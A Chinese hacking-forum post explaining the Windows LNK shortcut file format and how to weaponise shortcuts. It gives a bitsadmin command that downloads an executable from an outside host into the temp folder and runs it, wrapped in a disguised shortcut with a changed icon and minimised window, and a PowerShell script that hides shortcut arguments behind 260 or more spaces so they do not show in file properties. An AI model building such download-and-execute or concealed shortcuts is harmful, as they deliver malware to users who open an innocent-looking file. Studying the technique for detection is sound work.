快捷导航

Windows下快捷方式攻防技巧

[复制链接]
uuu 发表于 2018-5-28 00:17 | 显示全部楼层 |阅读模式
查看: 2137  |  回复: 0

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
0x01 前言
最近在某推上看见几个大牛都在玩PowerShell,特别看见利用快捷方式执行PowerShell脚本,所以想自己来研究一下快捷方式,感谢Jean-Pierre LESUEUR的分享。希望本文能够帮助到需要的人。
0x02 Lnk文件格式介绍文件整体结构
  • 文件头
  • Shell Item Id List 段
  • 文件位置信息段
  • 描述字符段
  • 相对路径段
  • 工作目录段
  • 命令行段
  • 图标文件段
  • 附加信息段
文件头结构
偏移 0h :值常为0000004CH,为字符"L"

偏移 4h :GUID

偏移 14h :Flags,用来标识快捷方式文件中有哪些可选属性
将该四字节以二进制表示
Bit 所在位为1时表示0   有shell item id list1   指向文件或文件夹,如果此位为0表示指向其他。2   存在描述字符串3   存在相对路径4   存在工作路径5   存在命令行参数6   存在自定义图标

其他大家可以自己分析一下。
偏移  大小      说明18h 1 dword 目标文件属性,后面解释。1ch 1 qword 文件创建时间24h 1 qword 文件修改时间2ch 1 qword 文件最后一次访问时间34h 1 dword 目标文件长度38h 1 dword 自定义图标个数,3ch 1 dword 目标文件执行时窗口显示方式:1、 正常显示 2、 最小化 3、 最大化40h 1 dword 热键44h 2 dword 暂时还不清楚用途值常为0Shell item ID list段
从14h位置我们可知有shell item id list

从4ch开始的第一个段为shell item id list

shell item id list总长度为E7
下一段(描述字符串)的起始地址为004e+00E7=0135h
描述字符段
描述字符段长度为004A

下一段(工作路径)的起始地址为0135+004A=017F

后面大家有兴趣可以继续分析,由于考虑本文长度,不再一一介绍。
0x03 BITSAdmin
BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress.
BITSAdmin是一个命令行工具,您可以使用它来创建下载或上传作业并监视其进度。
BITSAdmin命令的示例

bitsadmin /transfer downloader /priority normal http://isbase.cc/test.exe %temp%\test.exe
该命令将下载位于我们服务器中的应用程序文件到Windows临时文件夹。
构建一个快捷方式
桌面右键新建快捷方式,输入下列命令
cmd.exe /C "%windir%\System32\bitsadmin.exe /transfer downloader /priority normal https://isbase.cc/test.exe %temp%\test.exe & %temp%\test.exe"

现在你可以设置最小化和改变图标

0x04 隐藏Payload
实现起来很简单,只要将payload放置在260个空字符之后,这样就无法从文件属性发现payload,只能通过分析文件格式发现。最近PowerShell很火啊,也确实很方便,我们就用它来实现一个demo吧。
$cmd = "/c start calc.exe"$demo = New-Object -comObject WScript.Shell$lnk = $demo.CreateShortcut("G:\test\test.lnk")$lnk.TargetPath = "%SystemRoot%\system32\cmd.exe"$lnk.IconLocation = "%SystemRoot%\System32\Shell32.dll,23"$lnk.Arguments = '260以上空格'+ $cmd$lnk.Save()
直接打开powershell运行

这样就在G:\test\目录下生成了test.lnk文件

gif动画测试:

文件分析:
可以看见之间的空格填充,后面可以看见隐藏的参数

事实证明在Windows操作系统中一个来历不明的快捷方式都不能乱点哦。

永远支持黑客共享吧!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

本站内容均来自于互联网,仅供参考,请遵循当地相关法律法规。

快速回复 返回顶部 返回列表